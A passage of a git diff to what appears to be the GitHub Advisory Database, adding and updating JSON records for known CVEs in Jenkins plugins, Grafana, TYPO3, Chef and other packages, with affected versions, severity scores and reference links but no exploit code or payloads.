sometimes result in a long running SQL query because PoolCounter protection is mishandled.", "severity": [ { @@ -14,7 +15,25 @@ } ], "affected": [ - + { + "package": { + "ecosystem": "Packagist", + "name": "mediawiki/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.36.2" + } + ] + } + ] + } ], "references": [ { @@ -54,9 +73,9 @@ "cwe_ids": [ "CWE-770" ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:50:08Z", "nvd_published_at": "2021-10-11T08:15:00Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-c9px-7j36-f35v/GHSA-c9px-7j36-f35v.json b/advisories/github-reviewed/2022/05/GHSA-c9px-7j36-f35v/GHSA-c9px-7j36-f35v.json new file mode 100644 index 0000000000000..742b82bdcc5fd --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-c9px-7j36-f35v/GHSA-c9px-7j36-f35v.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c9px-7j36-f35v", + "modified": "2024-01-30T22:42:51Z", + "published": "2022-05-13T01:48:34Z", + "aliases": [ + "CVE-2018-1000189" + ], + "summary": "CSRF vulnerability and missing permission checks in Jenkins AbsInt Astrée Plugin", + "details": "A command execution vulnerability exists in Jenkins Absint Astree Plugin 1.0.5 and older in AstreeBuilder.java that allows attackers with Overall/Read access to execute a command on the Jenkins master.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:absint-astree" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.0.7" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.0.5" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000189" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-06-04/#SECURITY-807" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:42:51Z", + "nvd_published_at": "2018-06-05T20:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-ccmg-w4xm-p28v/GHSA-ccmg-w4xm-p28v.json b/advisories/github-reviewed/2022/05/GHSA-ccmg-w4xm-p28v/GHSA-ccmg-w4xm-p28v.json new file mode 100644 index 0000000000000..0e892e0431afc --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-ccmg-w4xm-p28v/GHSA-ccmg-w4xm-p28v.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ccmg-w4xm-p28v", + "modified": "2024-02-01T21:46:05Z", + "published": "2022-05-24T17:16:26Z", + "aliases": [ + "CVE-2020-12245" + ], + "summary": "Grafana XSS in header column rename", + "details": "Grafana before 6.7.3 allows table-panel XSS via column.title or cellLinkTooltip.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.7.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12245" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/pull/23816" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/commit/0284747c88eb9435899006d26ffaf65f89dec88e" + }, + { + "type": "WEB", + "url": "https://community.grafana.com/t/release-notes-v6-7-x/27119" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/blob/master/CHANGELOG.md#673-2020-04-23" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20200511-0001/" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00060.html" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00083.html" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00009.html" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00017.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:46:05Z", + "nvd_published_at": "2020-04-24T21:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-cgr9-h9qq-x9fx/GHSA-cgr9-h9qq-x9fx.json b/advisories/github-reviewed/2022/05/GHSA-cgr9-h9qq-x9fx/GHSA-cgr9-h9qq-x9fx.json new file mode 100644 index 0000000000000..c96cb2d155ace --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-cgr9-h9qq-x9fx/GHSA-cgr9-h9qq-x9fx.json @@ -0,0 +1,70 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cgr9-h9qq-x9fx", + "modified": "2024-02-07T22:30:03Z", + "published": "2022-05-02T06:18:14Z", + "aliases": [ + "CVE-2010-1022" + ], + "summary": "TYPO3 Authentication Bypass via Salted user password hashes extension", + "details": "The TYPO3 Security - Salted user password hashes (t3sec_saltedpw) extension before 0.2.13 for TYPO3 allows remote attackers to bypass authentication via unspecified vectors.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-saltedpasswords" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.2.13" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-1022" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/saltedpasswords" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20101125125343/http://secunia.com/advisories/38992" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20200228221050/http://www.securityfocus.com/bid/38799" + }, + { + "type": "WEB", + "url": "http://typo3.org/extensions/repository/view/t3sec_saltedpw/0.2.13/" + }, + { + "type": "WEB", + "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T22:30:03Z", + "nvd_published_at": "2010-03-19T19:00:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-cj2f-96jq-phpp/GHSA-cj2f-96jq-phpp.json b/advisories/github-reviewed/2022/05/GHSA-cj2f-96jq-phpp/GHSA-cj2f-96jq-phpp.json index 7d8e661b7cf38..dad13962fdb22 100644 --- a/advisories/github-reviewed/2022/05/GHSA-cj2f-96jq-phpp/GHSA-cj2f-96jq-phpp.json +++ b/advisories/github-reviewed/2022/05/GHSA-cj2f-96jq-phpp/GHSA-cj2f-96jq-phpp.json @@ -27,6 +27,25 @@ { "introduced": "0" }, + { + "fixed": "4.3.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "shopware/shopware" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0" + }, { "fixed": "5.1.5" } @@ -44,6 +63,14 @@ "type": "WEB", "url": "https://github.com/shopware/shopware/commit/d73e9031a5b2ab6e918eb86d1e2b2e873cd3558d" }, + { + "type": "WEB", + "url": "https://community.shopware.com/_detail_1918.html" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/shopware/shopware/CVE-2016-3109.yaml" + }, { "type": "WEB", "url": "https://web.archive.org/web/20200814090044/http://www.securityfocus.com/archive/1/538173/100/0/threaded" diff --git a/advisories/github-reviewed/2022/05/GHSA-cq9m-rpm5-27m9/GHSA-cq9m-rpm5-27m9.json b/advisories/github-reviewed/2022/05/GHSA-cq9m-rpm5-27m9/GHSA-cq9m-rpm5-27m9.json new file mode 100644 index 0000000000000..2991ab71eafdb --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-cq9m-rpm5-27m9/GHSA-cq9m-rpm5-27m9.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cq9m-rpm5-27m9", + "modified": "2024-01-30T21:53:52Z", + "published": "2022-05-13T01:17:42Z", + "aliases": [ + "CVE-2019-1003095" + ], + "summary": "Jenkins Perfecto Mobile Plugin stores credentials in plain text", + "details": "Jenkins Perfecto Mobile Plugin stores credentials unencrypted in its global configuration file on the Jenkins master where they can be viewed by users with access to the master file system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:perfectomobile" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.62.0.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003095" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1061" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-311" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:53:52Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-cqp7-hwm3-cfg7/GHSA-cqp7-hwm3-cfg7.json b/advisories/github-reviewed/2022/05/GHSA-cqp7-hwm3-cfg7/GHSA-cqp7-hwm3-cfg7.json new file mode 100644 index 0000000000000..d132fb2aaad03 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-cqp7-hwm3-cfg7/GHSA-cqp7-hwm3-cfg7.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cqp7-hwm3-cfg7", + "modified": "2024-01-30T22:27:57Z", + "published": "2022-05-13T01:31:34Z", + "aliases": [ + "CVE-2019-1003023" + ], + "summary": "XSS vulnerability in Jenkins Warnings Next Generation Plugin", + "details": "A cross-site scripting vulnerability exists in Jenkins Warnings Next Generation Plugin 1.0.1 and earlier in src/main/java/io/jenkins/plugins/analysis/core/model/DetailsTableModel.java, src/main/java/io/jenkins/plugins/analysis/core/model/SourceDetail.java, src/main/java/io/jenkins/plugins/analysis/core/model/SourcePrinter.java, src/main/java/io/jenkins/plugins/analysis/core/util/Sanitizer.java, src/main/java/io/jenkins/plugins/analysis/warnings/DuplicateCodeScanner.java that allows attackers with the ability to control warnings parser input to have Jenkins render arbitrary HTML.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "io.jenkins.plugins:warnings-ng" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.0.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.0.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003023" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-01-28/#SECURITY-1271" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:27:57Z", + "nvd_published_at": "2019-02-06T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-crvq-mw2w-4cfx/GHSA-crvq-mw2w-4cfx.json b/advisories/github-reviewed/2022/05/GHSA-crvq-mw2w-4cfx/GHSA-crvq-mw2w-4cfx.json new file mode 100644 index 0000000000000..feb3f8b4cf574 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-crvq-mw2w-4cfx/GHSA-crvq-mw2w-4cfx.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-crvq-mw2w-4cfx", + "modified": "2024-01-30T22:42:35Z", + "published": "2022-05-13T01:48:34Z", + "aliases": [ + "CVE-2018-1000197" + ], + "summary": "Jenkins Black Duck Hub Plugin allowed any user with Overall/Read to read and write its configuration", + "details": "An improper authorization vulnerability exists in Jenkins Black Duck Hub Plugin 3.0.3 and older in PostBuildScanDescriptor.java that allows users with Overall/Read permission to read and write the Black Duck Hub plugin configuration.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.blackducksoftware.integration:blackduck-hub" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.1.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.0.3" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000197" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-05-09/#SECURITY-670" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:42:35Z", + "nvd_published_at": "2018-06-05T21:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-cvh8-9j4x-5v4j/GHSA-cvh8-9j4x-5v4j.json b/advisories/github-reviewed/2022/05/GHSA-cvh8-9j4x-5v4j/GHSA-cvh8-9j4x-5v4j.json new file mode 100644 index 0000000000000..0ef01cd509abd --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-cvh8-9j4x-5v4j/GHSA-cvh8-9j4x-5v4j.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cvh8-9j4x-5v4j", + "modified": "2024-01-30T22:04:02Z", + "published": "2022-05-13T01:18:46Z", + "aliases": [ + "CVE-2018-1000424" + ], + "summary": "Jenkins Artifactory Plugin stored old directly entered credentials unencrypted on disk ", + "details": "An insufficiently protected credentials vulnerability exists in Jenkins Artifactory Plugin 2.16.1 and earlier in ArtifactoryBuilder.java, CredentialsConfig.java that allows attackers with local file system access to obtain old credentials configured for the plugin before it integrated with Credentials Plugin.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:artifactory" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.16.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000424" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-09-25/#SECURITY-265" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/106532" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-522" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:04:02Z", + "nvd_published_at": "2019-01-09T23:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-cwmx-hcrq-mhc3/GHSA-cwmx-hcrq-mhc3.json b/advisories/github-reviewed/2022/05/GHSA-cwmx-hcrq-mhc3/GHSA-cwmx-hcrq-mhc3.json index 25925fd8b0641..2ebb6482ab6d1 100644 --- a/advisories/github-reviewed/2022/05/GHSA-cwmx-hcrq-mhc3/GHSA-cwmx-hcrq-mhc3.json +++ b/advisories/github-reviewed/2022/05/GHSA-cwmx-hcrq-mhc3/GHSA-cwmx-hcrq-mhc3.json @@ -71,6 +71,10 @@ "type": "WEB", "url": "https://github.com/guzzle/guzzle/commit/74a8602c6faec9ef74b7a9391ac82c5e65b1cdab" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/guzzlehttp/guzzle/CVE-2022-29248.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/guzzle/guzzle" diff --git a/advisories/github-reviewed/2022/05/GHSA-cwxx-gwwj-pqjq/GHSA-cwxx-gwwj-pqjq.json b/advisories/github-reviewed/2022/05/GHSA-cwxx-gwwj-pqjq/GHSA-cwxx-gwwj-pqjq.json new file mode 100644 index 0000000000000..5bdaec9bac2ac --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-cwxx-gwwj-pqjq/GHSA-cwxx-gwwj-pqjq.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cwxx-gwwj-pqjq", + "modified": "2024-01-30T22:43:17Z", + "published": "2022-05-13T01:48:33Z", + "aliases": [ + "CVE-2018-1000145" + ], + "summary": "Jenkins Perforce Plugin uses ineffective credentials encryption", + "details": "An exposure of sensitive information vulnerability exists in Jenkins Perforce Plugin version 1.3.36 and older in PerforcePasswordEncryptor.java that allows attackers with local file system access to obtain encrypted Perforce passwords and decrypt them.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jvnet.hudson.plugins:perforce" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.3.36" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000145" + }, + { + "type": "PACKAGE", + "url": "https://github.com/jenkinsci/perforce-plugin" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-03-26/#SECURITY-373" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:43:17Z", + "nvd_published_at": "2018-04-05T13:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-f68m-q26r-64f6/GHSA-f68m-q26r-64f6.json b/advisories/github-reviewed/2022/05/GHSA-f68m-q26r-64f6/GHSA-f68m-q26r-64f6.json new file mode 100644 index 0000000000000..0c71e46340ae5 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-f68m-q26r-64f6/GHSA-f68m-q26r-64f6.json @@ -0,0 +1,62 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f68m-q26r-64f6", + "modified": "2024-02-08T15:31:52Z", + "published": "2022-05-17T05:26:20Z", + "aliases": [ + "CVE-2010-5142" + ], + "summary": "Chef Improper Access Control vulnerability", + "details": "`chef-server-api/app/controllers/users.rb` in the API in Chef before 0.9.0 does not require administrative privileges for the create, destroy, and update methods, which allows remote authenticated users to manage user accounts via requests to the /users URI.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "RubyGems", + "name": "chef" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.9.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-5142" + }, + { + "type": "WEB", + "url": "https://github.com/opscode/chef/commit/c3bb41f727fbe00e5de719d687757b24c8dcdfc8" + }, + { + "type": "PACKAGE", + "url": "https://github.com/chef/chef" + }, + { + "type": "WEB", + "url": "http://tickets.opscode.com/browse/CHEF-1289" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T15:31:52Z", + "nvd_published_at": "2012-08-08T10:26:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-fcmh-7492-g4q9/GHSA-fcmh-7492-g4q9.json b/advisories/github-reviewed/2022/05/GHSA-fcmh-7492-g4q9/GHSA-fcmh-7492-g4q9.json new file mode 100644 index 0000000000000..49f72b53e873a --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-fcmh-7492-g4q9/GHSA-fcmh-7492-g4q9.json @@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fcmh-7492-g4q9", + "modified": "2024-02-01T21:23:27Z", + "published": "2022-05-24T16:58:33Z", + "aliases": [ + "CVE-2019-17433" + ], + "summary": "z-song laravel-admin XSS via the Slug or Name on the Roles screen", + "details": "z-song laravel-admin 1.7.3 has XSS via the Slug or Name on the Roles screen, because of mishandling on the \"Operation log\" screen.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "encore/laravel-admin" + }, + "versions": [ + "1.7.3" + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-17433" + }, + { + "type": "WEB", + "url": "https://github.com/z-song/laravel-admin/issues/3847" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:23:27Z", + "nvd_published_at": "2019-10-10T12:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-ffj8-w4rj-vr7v/GHSA-ffj8-w4rj-vr7v.json b/advisories/github-reviewed/2022/05/GHSA-ffj8-w4rj-vr7v/GHSA-ffj8-w4rj-vr7v.json new file mode 100644 index 0000000000000..15e19d86a7869 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-ffj8-w4rj-vr7v/GHSA-ffj8-w4rj-vr7v.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ffj8-w4rj-vr7v", + "modified": "2024-01-30T21:57:55Z", + "published": "2022-05-13T01:15:08Z", + "aliases": [ + "CVE-2019-1003045" + ], + "summary": "ECS Publisher Plugin stored and displayed API token in plain text", + "details": "A vulnerability in Jenkins ECS Publisher Plugin 1.0.0 and earlier allows attackers with Item/Extended Read permission, or local file system access to the Jenkins home directory to obtain the API token configured in this plugin's configuration.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "de.eacg:ecs-publisher" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.0.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.0.0" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003045" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-03-25/#SECURITY-846" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/03/28/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107628" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-522" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:57:55Z", + "nvd_published_at": "2019-03-28T18:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-ffv8-x822-fx73/GHSA-ffv8-x822-fx73.json b/advisories/github-reviewed/2022/05/GHSA-ffv8-x822-fx73/GHSA-ffv8-x822-fx73.json new file mode 100644 index 0000000000000..61a4b0ab892e8 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-ffv8-x822-fx73/GHSA-ffv8-x822-fx73.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ffv8-x822-fx73", + "modified": "2024-01-30T22:00:54Z", + "published": "2022-05-13T01:25:15Z", + "aliases": [ + "CVE-2019-1003096" + ], + "summary": "Jenkins TestFairy Plugin stores credentials in plain text", + "details": "Jenkins TestFairy Plugin stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:TestFairy" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.17.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 4.16" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003096" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1062" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-522" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:00:54Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-fhgg-j92h-29rc/GHSA-fhgg-j92h-29rc.json b/advisories/github-reviewed/2022/05/GHSA-fhgg-j92h-29rc/GHSA-fhgg-j92h-29rc.json new file mode 100644 index 0000000000000..6a05feaff9909 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-fhgg-j92h-29rc/GHSA-fhgg-j92h-29rc.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fhgg-j92h-29rc", + "modified": "2024-01-30T21:59:05Z", + "published": "2022-05-13T01:25:16Z", + "aliases": [ + "CVE-2019-1003091" + ], + "summary": "Missing permission check in Jenkins SOASTA CloudTest Plugin", + "details": "A missing permission check in Jenkins SOASTA CloudTest Plugin in the CloudTestServer.DescriptorImpl#doValidate form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.soasta.jenkins:cloudtest" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.25" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003091" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1054" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:59:05Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-fv7m-wc3v-wr3w/GHSA-fv7m-wc3v-wr3w.json b/advisories/github-reviewed/2022/05/GHSA-fv7m-wc3v-wr3w/GHSA-fv7m-wc3v-wr3w.json index fa18584478f97..c3ba310c762fd 100644 --- a/advisories/github-reviewed/2022/05/GHSA-fv7m-wc3v-wr3w/GHSA-fv7m-wc3v-wr3w.json +++ b/advisories/github-reviewed/2022/05/GHSA-fv7m-wc3v-wr3w/GHSA-fv7m-wc3v-wr3w.json @@ -25,10 +25,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.12.0" }, { - "last_affected": "1.14.15" + "fixed": "1.14.16" } ] } @@ -40,6 +40,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-18121" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/simplesamlphp/simplesamlphp/CVE-2017-18121.yaml" + }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/02/msg00008.html" diff --git a/advisories/unreviewed/2022/05/GHSA-fvcf-wgxj-h7ch/GHSA-fvcf-wgxj-h7ch.json b/advisories/github-reviewed/2022/05/GHSA-fvcf-wgxj-h7ch/GHSA-fvcf-wgxj-h7ch.json similarity index 75% rename from advisories/unreviewed/2022/05/GHSA-fvcf-wgxj-h7ch/GHSA-fvcf-wgxj-h7ch.json rename to advisories/github-reviewed/2022/05/GHSA-fvcf-wgxj-h7ch/GHSA-fvcf-wgxj-h7ch.json index c000c2068f56a..baf05d51039dd 100644 --- a/advisories/unreviewed/2022/05/GHSA-fvcf-wgxj-h7ch/GHSA-fvcf-wgxj-h7ch.json +++ 